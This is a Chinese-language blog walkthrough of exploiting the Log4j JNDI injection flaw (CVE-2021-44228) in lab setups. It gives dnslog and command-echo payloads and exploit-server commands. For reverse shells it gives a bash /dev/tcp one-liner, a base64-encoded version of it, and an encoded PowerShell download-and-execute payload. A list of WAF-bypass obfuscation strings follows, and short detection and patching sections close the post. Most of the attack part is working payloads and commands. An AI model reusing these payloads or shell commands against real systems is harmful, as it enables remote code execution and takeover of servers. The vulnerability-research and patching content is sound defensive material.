CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux

妖狐艹你老母 2024-04-07 10:44 117阅读 0赞
#

0x00 漏洞描述

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大,建议客户尽快采取措施防护此漏洞

0x01 影响范围

Apache Log4j 2.x < 2.15.0-rc2
已知受影响组件 1、Apache Struts2 2、Apache Solr 3、Apache Flink 4、Apache Druid 5、ElasticSearch 6、flume 7、dubbo 8、Redis 9、logstash 10、kafka

11.vmvare

12.Spring-Boot-strater-log4j2

0x02 环境搭建

一、linux环境搭建

linxu环境下目前 Vulfocus 已经集成 Log4j2,可通过以下链接启动在线环境测试: http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行

68057279c8c6ca89fd635eceb723cfe1.png

启动dokcer环境

docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

b21b14ff45f5ec5011112f0041ac74af.png

http://192.168.1.4:8080/

71c5b4f42381479ba4b3134556c42396.png

二、win 本地环境

本地环境:java版本8u181,tomcat8.5.32

源码包:

链接:https://pan.baidu.com/s/1STgDdVb4QUm9r0t9wZZA-Q 提取码:uodm

d3f7502aaa4a98ba3f8fb32cd3d465dd.png

ROOT.war为Tomcat启动包,删除webapps目录下的ROOT目录,将ROOT.war放入Tomcat的webapps目录下,启动Tomcat即可

5d4cf7e5a299d44649a0ae4ee2251bec.png

cb97445ec11d704b49d17b0d9930a8a5.png

0x03 漏洞利用

一、linux环境下dnslog回显

注意:

Content-Type: application/x-www-form-urlencoded

post:
payload=${jndi:ldap://ti851c.dnslog.cn}

24d0041b34ca0dffa29568488db2af2d.png

dnslog回显:

f3e136fd893e82b8b9c13a58909f3179.png

二、win环境下dnslog回显

注意:

Content-Type: application/x-www-form-urlencoded

post:
payload=${jndi:ldap://ti851c.dnslog.cn}

#

7d2bf1482c41384d4504c32dfd65be62.png

dnslog回显:

0993de903b9762181048a40487d949e1.png

三、linux环境下命令回显

注意Content-Type: application/x-www-form-urlencoded
payload=${jndi:ldap://192.168.1.14:2222/TomcatBypass/TomcatEcho}
这里用到JNDIExploit-1.2-SNAPSHOT.jar工具启一个ldap服务

https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0

92c142e21e72b0ad264730d3373a107d.png

执行,成功回显

9f0b9272e419adda1f9e12714021cc1f.jpeg

fc61a547b4cd6449d40a58acc668e194.png

四、win环境下命令回显
#

1.注意Content-Type: application/x-www-form-urlencoded
这里用到JNDIExploit-1.2-SNAPSHOT.jar工具启一个ldap服务

https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0

c700fe2668ae558fcf8c1f65424866a8.png

2.这个是输入的payload: ${jndi:ldap://10.206.14.240:2222/Basic/TomcatEcho} ,使用的话IP修改为自己的起JNDI服务的IP即可,将刚才的包放入repeater,执行命令,添加自定义的header,cmd:whoami来执行

c762bf01bfac58c27bf474a03332bf3a.png

执行命令,并发送数据包,成功回显

e74a06f933597fbff526cb36876feb65.png

#
#
五、linux环境下反弹shell

1.JDK下载与安装(需要JDK1.8121 版本以下)

JDK下载地址:

https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

6ad9494eff2441029e9a282bb6ccfb33.png

2.攻击机上执行linux进行nc反弹监听命令
nc -nvlp 2333
3.生成bash反弹命令的payload

  1. bash -i >& /dev/tcp/192.168.1.14/2333 0>&1
  2. 4.在线网站对其payload进行编码
  3. https://www.jackson-t.ca/runtime-exec-payloads.html
  4. 得到:
  5. bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}

5.启动一个ldap服务

  1. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.1.14"

7d98d9f1e0aceac6e35e4a584eaa2d85.png

6.发送payload(这里ldap协议不太行,换成rmi协议可以)

因为java版本高于1.8.0_191之后,不会默认开启ldap,所以我们这里需要选择用rmi的方式来进行攻击。

注意Content-Type: application/x-www-form-urlencoded

  1. payload=${jndi:rmi://192.168.1.14:1099/zxeiar}

977894ba38bf2b9717bd609fac3c0e23.png

7.成功拿到shell

b1ccd249f346dc6fc6b287ba24042e30.png

六、win环境下反弹shell

1.kali下msf生成powershell

  1. use exploit/multi/script/web_delivery
  2. set payload payload/windows/x64/powershell_reverse_tcp
  3. set lhost 10.206.14.54
  4. set target 2
  5. run

0f4e07cb7337bf46fe2f83d7ee71d855.png

c6bcd5479948b2af6b376fab1b744cc5.png

2.生成的POC

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA

3.本地或vps启动服务

github下载JNDI-Injection-Exploit poc:

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

  1. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA" -A "192.168.1.7"

d7ec1834aa957c26ef2ad52fb400a1cc.png

2f671f7407d32ffe867419a55ff8b569.png

4.协议根据实际情况使用,这里使用rmi协议发送数据包。

${jndi:rmi://10.206.14.240:1099/6lwxbt}

3ad4319f61feccfe896766da47da4159.png

5.在msf中成功反弹win本地的shell.

051fd7d99f2902ad38e8826f2c16b206.png

0x04 判断方式

只需排查Java应用是否引入 log4j-api , log4j-core 两个jar。若存在应用使用,极大可能会受到影响。

0x05 漏洞排查

1.代码排查:

查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2

4df0ca96729cab96a8106aff8bca0cd7.jpeg

2.linux下命令排查:

  1. sudo find / -name "*log4j-*.jar"

563ce23f086f5ca240b69af01104564f.png

3.Win下命令排查:

  1. *log4j*.jar

e0077619d4fc8157a5824c75a2734dca.jpeg

  1. BurpLog4j2Scan被动扫描bp插件

https://github.com/tangxiaofeng7/BurpLog4j2Scan/releases/download/v1.1/BurpLog4j2Scan-1.0-SNAPSHOT.jar

7c335e4cd53c150c0a0515cf4e2bcc45.png

0x06 修复方式

1、升级版本至log4j-2.15.0
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
2、升级 jdk11.0.1,8u191,7u201,6u211 至更高版本
紧急缓解措施
1、修改jvm 在启动项添加参数 -Dlog4j2.formatMsgNoLookups=true
2、将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置 为 true
3、修改配置 log4j2.formatMsgNoLookups=True

0x07 绕过技巧

1.绕过rc1

  1. ${jndi:ldap://127.0.0.1:1389/ badClassName}
  2. 2.绕过WAF
  3. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
  4. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
  5. ${jndi:rmi://adsasd.asdasd.asdasd}
  6. ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
  7. ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
  8. ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
  9. ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
  1. rce对jdk版本要求比较严格:rmi方式jdk 6u132 7u131 8u121以前;ldap方式jdk11.0.1 8u191 7u201 6u211以前

0x08 参考文献

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

https://github.com/jas502n/Log4j2-CVE-2021-44228

https://github.com/0x727/JNDIExploit https://github.com/whwlsfb/Log4j2Scan/

https://github.com/dbgee/log4j2_rce

https://github.com/bkfish/Apache-Log4j-Learning

https://www.o2oxy.cn/3884.html

https://www.wangt.cc/2021/12/%EF%BC%88%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E5%A4%8D%E7%8E%B0%EF%BC%89cve-2021-44228-apache-log4j-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

https://www.skyzyw.com/article/18855.html

http://www.dmkxy.me/2021/12/10/Apache%20Log4j%20RCE%E6%BC%8F%E6%B4%9E/

https://syunaht.com/p/2341403076.html

发表评论

表情:
评论列表 (有 0 条评论,117人围观)

还没有评论,来说两句吧...

相关阅读

    相关 cve漏洞(cve漏洞库)

    怎样修复CVE-2015-5122漏洞 建议腾讯电脑管家修复 1)腾讯电脑管家会智能匹配电脑系统,针对性推送适合系统的高危漏洞补丁,而其他安全软件可能推送非高危漏洞补丁